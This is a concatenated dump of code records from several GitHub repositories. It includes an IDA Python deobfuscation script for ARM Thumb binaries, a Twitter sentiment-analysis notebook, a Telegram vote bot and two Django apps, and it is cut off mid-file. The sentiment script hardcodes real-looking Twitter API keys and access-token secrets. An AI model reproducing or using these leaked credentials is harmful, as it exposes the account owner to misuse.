#LDR.w Rt,[sp],#4\r\n register = (ins2 >> 28) & 0x0f\r\n if register in patches:\r\n address = get_wide_dword(ea + 8) + ea + 8\r\n ea2 = ea\r\n if (ea2 % 4) == 0:\r\n patch_word(ea2, 0xbf00) #nop\r\n ea2 += 2\r\n for b in patches[register]:\r\n patch_byte(ea2, b)\r\n ea2 += 1\r\n if (ea2 - ea) == 8: #total:16\r\n patch_word(ea2, 0xe002)\r\n elif (ea2 - ea) == 10: #total:16\r\n patch_word(ea2, 0xe001)\r\n elif (ea2 - ea) == 4: # total:16\r\n patch_word(ea2, 0xe004) # BL 3*2+2 address+4\r\n elif (ea2 - ea) == 6: # total:16\r\n patch_word(ea2, 0xe003)\r\n else: # show not exist\r\n ploge(ea, \"patch BLX 4964 error\")\r\n return\r\n ea2 += 2\r\n patch_dword(ea2, address)\r\n plogic(ea, \"patch BLX 4964\")\r\n else:\r\n plogw(ea, \"BLX 4964 register error:{%d}\" % register)\r\n else:\r\n plogw(ea, \"may be like BLX 4964, but ldr unknown\")\r\n else:\r\n plogi(ea, \"may be like BLX 4964\")\r\n\r\ndef patchPushPushMovsAdd(ea):\r\n if (get_wide_word(ea) & 0xff00) == 0xb500 and (get_wide_word(ea+2) & 0xff00) == 0xb500: #PUSH {Rn-Rx,LR} PUSH {Rn-Rx,LR}\r\n ins1 = get_wide_word(ea+30) # STR R6,[R0,#24] T1 01100{imm5}nnnttt STR Rt,[Rn{,#<imm>}] imm32=imm5:'00'\r\n ins2 = get_wide_word(ea+32) # POP {R6} T1 1011110P{reg_list} POP <register>\r\n ins3 = get_wide_word(ea+34) # B\r\n if (ins1 & 0xf800) == 0x6000 and (ins2 & 0xff00) == 0xbc00 and (ins3 & 0xff00) == 0xe000:\r\n ins4 = get_wide_word(ea+20) # ADR R6,# T1 10100ddd{imm8} ADR Rd,<label> imm32=imm8:'00'\r\n ins5 = get_wide_word(ea+24) # MOVS R1,# T1 00100ddd{imm8} MOVS Rd,#imm8 imm32=ZeroExtend(imm8)\r\n ins6 = get_wide_word(ea+26) # ADDS R6,# T2 00110nnn{imm8} ADDS Rd,#imm8 imm32=ZeroExtend(imm8)\r\n if (ins4 & 0xff00) != 0xa600 or (ins5 & 0xff00) != 0x2100 or (ins6 & 0xff00) != 0x3600:\r\n plogw(ea, \"may be Push Push Movs Add\")\r\n address = ((ins4 & 0xff) << 2) + 4 + ea + 20 + 1\r\n address += (ins5 & 0xff) + (ins6 & 0xff)\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push Push Movs Add b %08x\" % address)\r\n\r\ndef patchPushBlBlPushAddAddAddPop(ea):\r\n if (get_wide_word(ea) & 0xff00) == 0xb500 and get_wide_dword(ea+10) == 0xf802f000 and get_wide_dword(ea+14) == 0xe800f000: #PUSH {,LR} bl 6 bl 0\r\n ins1 = get_wide_word(ea+2) # ADR R4,# T1 10100ddd{imm8} ADR Rd,<label> imm32=imm8:'00'\r\n ins2 = get_wide_word(ea+4) # SUBS R4,# T2 00111ddd{imm8} SUB Rd,#<imm8> imm32=imm8\r\n ins3 = get_wide_word(ea+24) # ADDS R0,R0,#4 T1 0001110{imm3}nnnddd ADDS Rd,Rn,#imm3\r\n ins4 = get_wide_word(ea+26) # ADDS R0,#0xc T2 00110ddd{imm8} ADDS Rd,#<imm8>\r\n ins5 = get_wide_word(ea+28) # ADDS R0,R0,#7 T1 0001110{imm3}nnnddd ADDS Rd,Rn,#imm3\r\n if (ins3 & 0xfe3f) != 0x1c00 or (ins4 & 0xff00) != 0x3000 or (ins5 & 0xfe3f) != 0x1c00:\r\n plogw(ea, \"may be Push BL BL Push Add Add Add Pop\")\r\n address = ((ins1 & 0xff) << 2) + ea + 4\r\n address -= ins2 & 0xff\r\n address += (ins3 >> 6) & 0x7\r\n address += ins4 & 0xff\r\n address += (ins5 >> 6) & 0x7\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch Push BL BL Push Add Add Add Pop b %08x\" % address)\r\n\r\ndef patchPushBlx4998(ea):\r\n if get_wide_word(ea) == 0xb503:\r\n ea1 = ea+2\r\n if get_wide_word(ea1) == 0xbf00: #NOP\r\n ea1 += 2\r\n ins1 = get_wide_dword(ea1)\r\n if (ins1 & 0xc000f800) == 0xc000f000: # BL T1 11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n inss = cs_arm_thumb(get_bytes(ea1, 4), ea1)\r\n if inss:\r\n if inss[0].operands[0].imm == 0x4998:\r\n address = get_s32(get_wide_dword(ea1+4)) + ea1 + 4\r\n put_unconditional_branch(ea, address)\r\n plogic(ea, \"patch BLX 4998 b %08x\" % address)\r\n else:\r\n plogw(ea, \"like blx 4998\")\r\n else:\r\n plogw(ea, \"like blx 4998\")\r\n\r\ndef patchLdrRtLabel(ea, rt, label):\r\n offset = label - ea - 2\r\n if (offset > 4096) or (offset < -4096):\r\n raise RuntimeError(\"Invalid offset, LDR, Rt,label\")\r\n if offset >= 0:\r\n patch_byte(ea, 0xdf)\r\n else:\r\n patch_byte(ea, 0x5f)\r\n patch_byte(ea+1, 0xf8)\r\n patch_byte(ea+2, offset & 0xff)\r\n patch_byte(ea+3, ((offset >> 8) & 0xf) | (rt << 4))\r\n\r\ndef patchSubspPushBl4a04(ea): #todo no space\r\n if get_wide_word(ea) == 0xb083 and get_wide_word(ea+2) == 0xb503: # SUB SP,SP,#0xC PUSH {R0,R1,LR}\r\n ea1 = ea + 4\r\n if get_wide_word(ea1) == 0xbf00: # nop\r\n ea1 += 2\r\n ins1 = get_wide_dword(ea1)\r\n if (ins1 & 0xc000f800) == 0xc000f000: # BL T1 11110S{imm10} 11{j1}1{j2}{imm11} BLX T2 11110S{imm10H} 11{j1}0{j2}{imm10L}H\r\n inss = cs_arm_thumb(get_bytes(ea1, 4), ea1)\r\n if inss:\r\n if inss[0].operands[0].imm == 0x4a04:\r\n address = get_s32(get_wide_dword(ea1+4)) + ea1 + 4\r\n patchLdrRtLabel(ea, 0, address)\r\n patchLdrRtLabel(ea+4, 1, address + 4)\r\n\r\npatch_start=0x0000\r\npatch_end=0x886e0\r\nfor ea in range(patch_start, patch_end):\r\n #patchPushSubsAdds(ea)\r\n #patch494c(ea)\r\n #patchPushAdrBLAddsPop(ea)\r\n #patchPushAdrMovsBeqBne(ea)\r\n #patchSubPushBlx4964(ea)\r\n #patchPushPushMovsAdd(ea)\r\n #patchPushBlBlPushAddAddAddPop(ea)\r\n\r\n #patchPushBlx4998(ea)\r\n pass\r\n\r\nea = here()\r\n\r\n\r\nprint(\"PatchBlukEnd\")"
},
{
"alpha_fraction": 0.694915235042572,
"alphanum_fraction": 0.7966101765632629,
"avg_line_length": 59,
"blob_id": "4ba7b96a9f3856b1c3e2723b0cdd2edca5f5c556",
"content_id": "6f5b53f1987f349d7449acd838bb860cedf2c466",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 59,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 1,
"path": "/readme.md",
"repo_name": "lin1man/sgmainRev",
"src_encoding": "UTF-8",
"text": "Practice for https://habr.com/en/company/drweb/blog/452076/"
}
] | 2 |
prnvambadi/Twitter-Sentiment_analysis | https://github.com/prnvambadi/Twitter-Sentiment_analysis | d0d2c588dd6b723af4ca9d8adc36464dbf0e19a4 | b3cdc735225c5eb2582f40023e94b412533162db | 4dc44e1afdbd984eeab12bca6ca6268d27d3b1c1 | refs/heads/master | 2023-06-10T06:36:12.617388 | 2021-07-01T03:29:12 | 2021-07-01T03:29:12 | 381,449,904 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.649782121181488,
"avg_line_length": 14.810344696044922,
"blob_id": "da574e0139e4b4c017db8644c843fe1701a8019b",
"content_id": "1eea141e975d04f1476116665c6800a22a75059a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3672,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 232,
"path": "/Sentimental.py",
"repo_name": "prnvambadi/Twitter-Sentiment_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[75]:\n\n\nfrom IPython.display import Image\nImage(filename='beef36fd707d.jpg')\n\n\n# ### Twitter Data Sentiment Analysis\n# - 1) Twitter Data:- First step is to configure twitter API and gather twitter data\n# - 2) Clean the data\n# - 3) Sentiment:- To find out sentiments\n# - 4) Analysis:- To do analysis\n\n# In[47]:\n\n\nimport tweepy \nfrom textblob import TextBlob #sentimnts library\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom wordcloud import WordCloud\nplt.style.use('fivethirtyeight')\n\n\n# In[2]:\n\n\nAPIKey=\"W2XtGXNhNK9M03XcEA9LLVa17\"\nAPISecretKey=\"J7wmwyKXxBfaOmn2LVtLloP28NJWcrUR6L2MQeqn8VFAjC6nQO\"\naccessToken=\"1387284148713234445-21fcTuPB6LTh6Zyi9Zxb5zxrxEIu8N\"\naccessTokenSecret=\"UK4vgiRYtjkev6c3JouvqXkv4Z0FQD3fsmbPYHPJFiItG\"\n\n\n# In[3]:\n\n\n### Authenticate\nauthenticate= tweepy.OAuthHandler(APIKey,APISecretKey)\nauthenticate.set_access_token(accessToken,accessTokenSecret)\napi=tweepy.API(authenticate)\n\n\n# In[4]:\n\n\nposts=api.user_timeline(screen_name='Trump',count=100,lang=\"en\",tweet_mode='extended')\ni=1\nfor tweet in posts[:10]:\n print(str(i)+')'+ tweet.full_text+'\\n')\n i=i+1\n\n\n# In[9]:\n\n\n# Create a dataframe with a column called tweets\ndf=pd.DataFrame([tweet.full_text for tweet in posts],columns=['Tweets'])\n\n\n# In[10]:\n\n\ndf\n\n\n# In[31]:\n\n\ndef cleanTxt(text):\n text=re.sub('@[a-zA-Z0-9]*','',text)\n text=re.sub(\"#\",'',text)\n text=re.sub('RT[\\s]+','',text)\n text=re.sub('https?:\\/\\/\\S+','',text)\n return text\n\n\n# In[32]:\n\n\ndf['Tweets']=df['Tweets'].apply(cleanTxt)\n\n\n# In[33]:\n\n\ndf\n\n\n# In[43]:\n\n\nanalysis=TextBlob(\"Today was the beautiful day\")\n\n\n# In[44]:\n\n\nanalysis.sentiment\n\n\n# In[34]:\n\n\n# create a function to get the subjectivity of all the tweets\ndef getSubject(text):\n return TextBlob(text).sentiment.subjectivity\n# create a function to get the Polarity of all the tweets\ndef getPolar(text):\n return TextBlob(text).sentiment.polarity\n\n#create columns subj and polar\ndf['Subjectivity']=df['Tweets'].apply(getSubject)\ndf['Polarity']=df['Tweets'].apply(getPolar)\n\n\n# In[48]:\n\n\ndf\n\n\n# # Do Analysis\n\n# In[35]:\n\n\n#WordCloud Visualization\nallwords = ''.join([i for i in df['Tweets']])\nCloud=WordCloud(random_state=0,max_font_size=100,width=500,height=300).generate(allwords)\nplt.imshow(Cloud)\nplt.show()\n\n\n# In[37]:\n\n\n# Create a fucntion to compute negative neutral postive comments\ndef getAnalysis(score):\n if score<0:\n return 'negative'\n elif score==0:\n return 'Neutral'\n else:\n return 'Positive'\ndf['Analysis']=df['Polarity'].apply(getAnalysis)\ndf\n\n\n# In[41]:\n\n\ndf[df['Analysis']=='negative']\n\n\n# In[42]:\n\n\ndf['Analysis'].value_counts()\n\n\n# In[53]:\n\n\n## plotting scatter plot\nfor i in range(0,df.shape[0]):\n plt.scatter(df['Polarity'][i],df['Subjectivity'][i],color='Blue')\n \nplt.title(\"Sentiment Analysis\")\nplt.xlim(-1,1)\nplt.xlabel('Polarity')\nplt.ylabel('Subjectivity')\nplt.figure(figsize=(8,6))\n\n\n# In[59]:\n\n\ndf['Analysis'].value_counts().plot(kind='bar')\n\nplt.title(\"Sentimental Analysis\")\nplt.xlabel('Polarity')\nplt.ylabel('Count')\nplt.show()\n\n\n# ### Only Positive tweets\n\n# In[65]:\n\n\ni=1\npostdf=df.sort_values(by=['Polarity'],ascending=False)\nfor j in range(0,postdf.shape[0]):\n if(postdf['Analysis'][j]=='Positive'):\n print(str(i)+')'+postdf['Tweets'][j])\n print()\n i=i+1\n\n\n# ### Only Negative Comments\n\n# In[67]:\n\n\ni=1\npostdf=df.sort_values(by=['Polarity'])\nfor j in range(0,postdf.shape[0]):\n if(postdf['Analysis'][j]=='negative'):\n print(str(i)+')'+postdf['Tweets'][j])\n print()\n i=i+1\n\n\n# ### Neutral Comments\n\n# In[69]:\n\n\ni=1\npostdf=df.sort_values(by=['Polarity'])\nfor j in range(0,postdf.shape[0]):\n if(postdf['Analysis'][j]=='Neutral'):\n print(str(i)+')'+postdf['Tweets'][j])\n print()\n i=i+1\n\n\n# In[ ]:\n\n\n\n\n"
}
] | 1 |
shlipenbah/holodilnik-vote | https://github.com/shlipenbah/holodilnik-vote | bbe023b992ee95ef088f4648842e8fa0626a349a | ff1b98e3e0a7e012f052f1739ca9fa6de44578ad | 5c2159b422a23eda1d8fb473f3f4e62b11fcc98e | refs/heads/master | 2020-03-22T08:13:22.161919 | 2018-07-04T20:18:46 | 2018-07-04T20:18:46 | 139,753,117 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.703281044960022,
"alphanum_fraction": 0.7068473696708679,
"avg_line_length": 32.19047546386719,
"blob_id": "0d61b47240d960c7fff3df843cc19279c0adccbc",
"content_id": "c8b030708aaebc6b6a961b895c06ca0368a3b1dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 42,
"path": "/holodilnik.py",
"repo_name": "shlipenbah/holodilnik-vote",
"src_encoding": "UTF-8",
"text": "import logging\nimport yaml\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler\n\n\nwith open('config.yml') as config:\n params = yaml.load(config)\n updater = Updater(token=params['token'])\n\n\ndef start(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\n\n\ndef stop():\n updater.stop()\n\n\ndef new_vote(bot, update, args):\n usage='You should specify [vote_name] [variant1] [variant2] and so on'\n if not args:\n bot.send_message(chat_id=update.message.chat_id, text=usage)\n elif len(args) in range(3):\n bot.send_message(chat_id=update.message.chat_id, text='Does only one variant make sense? {}'.format(usage))\n else:\n confirmation=\"You want to create a vote {} with {} variants, don't you?\".format(args[0], len(args) - 1)\n bot.send_message(chat_id=update.message.chat_id, text=confirmation)\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# To add start command\ndispatcher = updater.dispatcher\nstart_handler = CommandHandler('start', start)\nvote_handler = CommandHandler('newvote', new_vote, pass_args=True)\nstop_handler = CommandHandler('stop', updater.stop())\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(vote_handler)\ndispatcher.add_handler(stop_handler)\n\n# To start the bot, run\nupdater.start_polling()\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.8103448152542114,
"alphanum_fraction": 0.8103448152542114,
"avg_line_length": 18.33333396911621,
"blob_id": "2c8a23fcd6fba877f7696317f542a98826be83b1",
"content_id": "eeb1e20c6f69d64b15e7124d8d1daea570f07452",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 3,
"path": "/README.md",
"repo_name": "shlipenbah/holodilnik-vote",
"src_encoding": "UTF-8",
"text": "# holodilnik-vote\nPython vote-bot for telegram\ndraft mode\n"
}
] | 2 |
injusticescorpio/add | https://github.com/injusticescorpio/add | 5aa7b6488a1960523c945f4d6cfa9fd0f07ebfc9 | 1c1dd71be9951433c50c73d12cc30d6f1f806230 | fbdd398bded812b6271d12c602b033242df47ea3 | refs/heads/master | 2023-01-22T01:49:20.635630 | 2020-11-27T15:54:15 | 2020-11-27T15:54:15 | 316,542,685 | 3 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5436720252037048,
"alphanum_fraction": 0.5490196347236633,
"avg_line_length": 27.049999237060547,
"blob_id": "d7057207923acd686c645bf55cb6d15734326f97",
"content_id": "ea4533594789c3e3603b7eb2c34e1c7102aaef48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 20,
"path": "/firstapp/templates/index.html",
"repo_name": "injusticescorpio/add",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html lang=\"en\" dir=\"ltr\">\n <head>\n <meta charset=\"utf-8\">\n <title></title>\n </head>\n <body>\n <h1>Add two numbers in Django</h1>\n <form class=\"\" action={%url 'basicapp:add'%} method=\"POST\">\n <label for=\"a\">Enter First Number:</label>\n    \n <input id=\"a\" type=\"text\" name=\"a\" value=\"\"><br><br>\n <label for=\"b\">Enter Second Number:</label>\n <input id=\"b\" type=\"text\" name=\"b\" value=\"\"><br><br>\n {% csrf_token %}\n <input type=\"submit\" name=\"\" value=\"submit\">\n </form>\n\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.7108433842658997,
"alphanum_fraction": 0.7108433842658997,
"avg_line_length": 15.600000381469727,
"blob_id": "ab05072c02a4f15198ae6c2e64ab1fe2d3856a48",
"content_id": "0ae6cc2450f97768d8af220ee7e0c7428259c005",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 166,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/firstapp/urls.py",
"repo_name": "injusticescorpio/add",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom firstapp import views\n\napp_name=\"basicapp\"\nurlpatterns = [\n\npath('',views.index,name=\"index\"),\npath('add/',views.add,name=\"add\")\n\n]\n"
},
{
"alpha_fraction": 0.6713286638259888,
"alphanum_fraction": 0.6783216595649719,
"avg_line_length": 21,
"blob_id": "52d76f9082404a0eff0bccf71c982e03720eba93",
"content_id": "f54c8c84d459aedd498eaca71189e058f9269108",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/firstapp/views.py",
"repo_name": "injusticescorpio/add",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\n\ndef index(request):\n return render(request,\"index.html\")\n\ndef add(request):\n val=request.POST.get('a')\n val2=request.POST.get('b')\n s=int(val)+int(val2)\n\n return render(request,\"add.html\",context={'sum':s})\n"
}
] | 3 |
bffred/afpa_meca | https://github.com/bffred/afpa_meca | 68451dde1534e8fa1cd3bd76f4652d7e4ae82c1d | 55c3d8783d45b8a2759ffdea79ade54439989422 | 3970f0c66fc5352c4b4c191031a61a792543d11d | refs/heads/master | 2020-03-27T03:11:41.303890 | 2018-08-21T12:45:44 | 2018-08-21T12:45:44 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7628361582756042,
"alphanum_fraction": 0.7628361582756042,
"avg_line_length": 25.40322494506836,
"blob_id": "9b3f16d183556d54494bf89fec5a4760f8d0aed8",
"content_id": "d9a080a25e16fdd4539f7709c70bdb5a88815cbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1636,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 62,
"path": "/garage/admin.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import *\nfrom .models import Utilisateur\nfrom django.contrib.auth.admin import UserAdmin as BaseUserAdmin\nfrom django.contrib.auth.models import User\n\n# Register your models here.\n\nclass UtilisateurInline(admin.StackedInline):\n model = Utilisateur\n can_delete = False\n verbose_name_plural = 'Utilisateurs'\n\nclass UserAdmin(BaseUserAdmin):\n inlines = (UtilisateurInline, )\n\nclass ClientInline(admin.TabularInline):\n model = Client\n can_delete = False\n\nclass DonneesPersonnellesAdmin(admin.ModelAdmin):\n inlines = (ClientInline, )\n\nclass ZipCodeInline(admin.TabularInline): \n model = City.zip_codes.through\n verbose_name = \"Code Postal\"\n verbose_name_plural = \"Codes Postaux\"\n \nclass ZipCodeAdmin(admin.ModelAdmin):\n exclude = (\"zipCode\", )\n inlines = (ZipCodeInline, )\n\nclass CityInline(admin.TabularInline):\n model = City.zip_codes.through\n verbose_name = \"Ville\"\n\nclass CityAdmin(admin.ModelAdmin):\n exclude = (\"zipCode\", )\n inlines = (CityInline, )\n\n\n# Register your models here.\nadmin.site.register(Address)\nadmin.site.register(ZipCode, ZipCodeAdmin)\nadmin.site.register(City, CityAdmin)\n\nadmin.site.unregister(User)\nadmin.site.register(User, UserAdmin)\n\nadmin.site.register(Vehicule)\nadmin.site.register(Motorise)\nadmin.site.register(Moto)\nadmin.site.register(Voiture)\nadmin.site.register(Velo)\n\n\nadmin.site.register(Intervention)\nadmin.site.register(Devis)\nadmin.site.register(Piece)\nadmin.site.register(Fournisseur)\nadmin.site.register(DonneesPersonnelles, DonneesPersonnellesAdmin)\nadmin.site.register(Piece_Fournisseur_Devis)"
},
{
"alpha_fraction": 0.709833025932312,
"alphanum_fraction": 0.709833025932312,
"avg_line_length": 58.88888931274414,
"blob_id": "418a122c73c69595974e1e3e7a82bead28db19ed",
"content_id": "6e27e487fc9be994ce68123f5f8fd5ca8ffecd88",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2695,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 45,
"path": "/garage/urls.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.urls import path\n\nfrom django.views.generic import ListView\nfrom . import views\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom .models import Client\nfrom django.conf.urls import url, include\nfrom django.contrib.auth.decorators import login_required\n\n\napp_name = 'garage'\n\nurlpatterns = [ \n url(r'login', LoginView.as_view(redirect_authenticated_user=True, template_name=\"garage/login.html\"),\n name='login'),\n url(r'logout', LogoutView.as_view(template_name=\"garage/logout.html\"), name='logout'),\n \n url(r'^recherche/$', login_required(views.recherche), name='recherche'),\n path('accueil/', login_required(views.Accueil.as_view()), name='accueil'),\n\n path('client-create', login_required(views.ClientCreateView.as_view()), name='client-create'), \n path('client-select/', login_required(views.ClientSelect.as_view()), name=\"client-select\"),\n path('clients', login_required(views.Clients.as_view()), name=\"clients\"),\n path('client-update/<pk>/', login_required(views.ClientUpdate.as_view()), name='client-update'),\n\n path('velo-select/<int:client_id>/', login_required(views.VeloSelect.as_view()), name=\"velo-select\"),\n path('velo-create/<int:client_id>/', login_required(views.VeloCreate.as_view()), name='velo-create'),\n path('velos', login_required(views.VeloList.as_view()), name=\"velos\"),\n path('velo-update/<pk>/', login_required(views.VeloUpdate.as_view()), name='velo-update'),\n\n path('moto-select/<int:client_id>/', login_required(views.MotoSelect.as_view()), name=\"moto-select\"),\n path('moto-create/<int:client_id>/', login_required(views.MotoCreate.as_view()), name='moto-create'),\n path('motos', login_required(views.MotoList.as_view()), name=\"motos\"),\n path('moto-update/<pk>/', login_required(views.MotoUpdate.as_view()), name='moto-update'),\n\n path('voiture-select/<int:client_id>/', login_required(views.VehiculeSelect.as_view()), name=\"voiture-select\"),\n path('voiture-create/<int:client_id>/', login_required(views.VoitureCreate.as_view()), name='voiture-create'),\n path('voitures', login_required(views.VehiculeList.as_view()), name=\"voitures\"),\n path('nouveau-choix-vehicule', views.ChoixVehicule, name=\"choixVehicule\"),\n path('voiture-update/<pk>/', login_required(views.VoitureUpdate.as_view()), name='voiture-update'),\n\n path('intervention-create/<int:vehicule_id>/', login_required(views.InterventionCreate.as_view()), name='intervention-create'),\n path('interventions', login_required(views.Interventions.as_view()), name=\"interventions\"),\n path('intervention-update/<pk>/', login_required(views.InterventionUpdate.as_view()), name='intervention-update'),\n]\n"
},
{
"alpha_fraction": 0.6589841842651367,
"alphanum_fraction": 0.6656472086906433,
"avg_line_length": 37.141666412353516,
"blob_id": "5168b7f4f2d99ec3ede5dca2b5eba3ce223d6252",
"content_id": "d3bc2e908d2fc72a20fc14fc913da0b74d7c71fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9197,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 240,
"path": "/garage/models.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom datetime import datetime\nfrom django.contrib.auth.models import User\nfrom django.db import models \n \nclass ZipCode(models.Model):\n zip_code = models.CharField(max_length=15, verbose_name = 'Code Postal',)\n\n def __str__(self):\n return str( self.zip_code )\n class Meta:\n verbose_name = \"Code Postal\"\n verbose_name_plural = \"Codes Postaux\"\n\n\nclass City(models.Model):\n city_name = models.CharField(max_length =25, verbose_name = \"Ville\",)\n zip_codes = models.ManyToManyField(ZipCode, verbose_name=\"Code Postal\")\n\n def __str__(self):\n return str(self.city_name)\n class Meta:\n verbose_name = \"Ville\"\n verbose_name_plural = \"Villes\" \n \n\nclass Address(models.Model):\n street = models.TextField(max_length=50, blank=False, verbose_name = \"Nom de la rue\",)\n street_number = models.CharField(max_length = 30, null=True, blank = True, verbose_name = \"Numéro de la rue\",)\n street_complement = models.CharField(max_length =50, null=True, blank = True, verbose_name = \"Complément d'adresse\",)\n\n city = models.ForeignKey(City, on_delete=models.CASCADE, verbose_name = 'Ville')\n zipCode = models.ForeignKey(ZipCode, on_delete=models.CASCADE, verbose_name = 'Code Postal')\n \n class Meta:\n verbose_name = \"Adresse\"\n def __str__(self):\n return str(self.street_number) + \" \" + str(self.street) + \" \" + str(self.street_complement) + \" \" + str(self.zipCode) + \" \" + str(self.city)\n\n\nclass DonneesPersonnelles(models.Model):\n mail_client = models.EmailField(\"Email Client\", max_length=35, unique=True)\n telephone_client = models.CharField(\"Téléphone Client\", blank=False, max_length=10, null=True)\n carte_AFPA_img = models.ImageField(\"Carte AFPA\", null=True, blank=True, upload_to=\"img/carte_AFPA_client\")\n\n class Meta:\n verbose_name = \"Donnée Personnelle\"\n verbose_name_plural = \"Données Personnelles\"\n def __str__(self) :\n return \"Adresse mail : {0} Téléphone : {1}\".format(self.mail_client, self.telephone_client)\n \n\nclass Client(models.Model):\n nom_client = models.CharField(\"Nom Client\", max_length=15)\n prenom_client = models.CharField(\"Prenom Client\", max_length=15)\n numero_afpa_client = models.CharField(\"Numéro carte AFPA Client\", max_length=10, default=\"extérieur\")\n donnees_personnelles_client = models.OneToOneField(DonneesPersonnelles, on_delete=models.CASCADE)\n adresse = models.OneToOneField(Address, null=True, on_delete=models.CASCADE)\n\n def __str__(self):\n return \"{0} {1} N° AFPA : {2}\".format(self.nom_client, self.prenom_client, self.numero_afpa_client)\n\n\nclass Vehicule(models.Model): \n libelle_modele = models.CharField(\"libellé modèle\", blank=False, max_length=50)\n type_vehicule = models.CharField(\n max_length = 10,\n default=\"\"\n )\n client = models.ForeignKey(Client, null=True, on_delete=models.CASCADE)\n\n \n def is_upperclass(self):\n return self.type_vehicule in (self.MOTO, self.VOITURE)\n \n class Meta:\n #abstract = True\n verbose_name = \"Véhicule\"\n verbose_name_plural = \"Véhicules\"\n \n def __str__(self):\n return self.libelle_modele\n\n\nclass Motorise(Vehicule):\n libelle_marque = models.CharField(\"libellé marque\", max_length=100, null=True)\n vin = models.CharField(max_length=100, blank=False, null=True)\n immatriculation = models.CharField( max_length=15, blank=False, null=True)\n kilometrage = models.IntegerField(null=True, blank=True)\n date_mec = models.DateField(\"date de première m.e.c.\", null=True)\n carte_grise_img = models.ImageField(\"carte grise\", null=True, blank=False, upload_to=\"img/carte_grise\")\n carte_assurance_img = models.ImageField(\"carte assurance\", null=True, blank=False, upload_to=\"img/carte_assurance\")\n\n class Meta:\n #abstract = True\n verbose_name = \"Motorisé\"\n verbose_name_plural = \"Motorisés\"\n\n def __str__(self):\n return self.immatriculation + \" \" + self.libelle_modele + \" \" + self.libelle_marque\n\n\nclass Voiture(Motorise):\n def __str__(self):\n return Motorise.__str__(self) + \" \" + self.type_vehicule\n\n\nclass Moto(Motorise):\n def __str__(self):\n return Motorise.__str__(self) + \" \" + self.type_vehicule\n\n\nclass Velo(Vehicule):\n type_vehicule = \"Velo\"\n \n def __str__(self):\n return Vehicule.__str__(self) + \" \" + self.type_vehicule \n class Meta:\n verbose_name = \"Vélo\"\n verbose_name_plural = \"Vélos\"\n\n\nclass Utilisateur(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n date_entree_stage = models.DateField(null=True, blank=True)\n date_sortie_stage = models.DateField(null=True, blank=True)\n carte_afpa = models.CharField(\"Numéro carte AFPA\", max_length=10, blank=False, )\n \n def __str__(self):\n return \"Profil de {0}\".format(self.user.username)\n\n\nclass Intervention(models.Model):\n date_saisie_intervention = models.DateTimeField(\"date d'intervention\", null=True, blank=False, default=datetime.now )\n date_restitution_prevu = models.DateField(\"Date de restitution prévisionnelle\", null=True)\n diagnostic = models.TextField(max_length=300, null=True)\n intervention_a_realiser = models.TextField(\"interventions prévus\", max_length=300, null=True)\n intervention_realisee = models.BooleanField(\"intervention réalisée\", null=False, default=False)\n\n utilisateur = models.ForeignKey(User, on_delete=models.CASCADE)\n vehicule = models.ForeignKey(Vehicule, on_delete=models.CASCADE)\n \n ValidationFormateur = 'VF'\n AttenteFormateur = 'AF'\n RefusFormateur = 'RF'\n AttenteDevis = 'AD'\n \n Statut_choice = (\n (ValidationFormateur, 'ValidationFormateur'),\n (AttenteFormateur, 'AttenteFormateur'),\n (RefusFormateur, 'RefusFormateur'),\n (AttenteDevis, 'AttenteDevis'),\n )\n statut = models.CharField(\n max_length = 20,\n choices = Statut_choice,\n default = AttenteDevis,\n )\n\n def 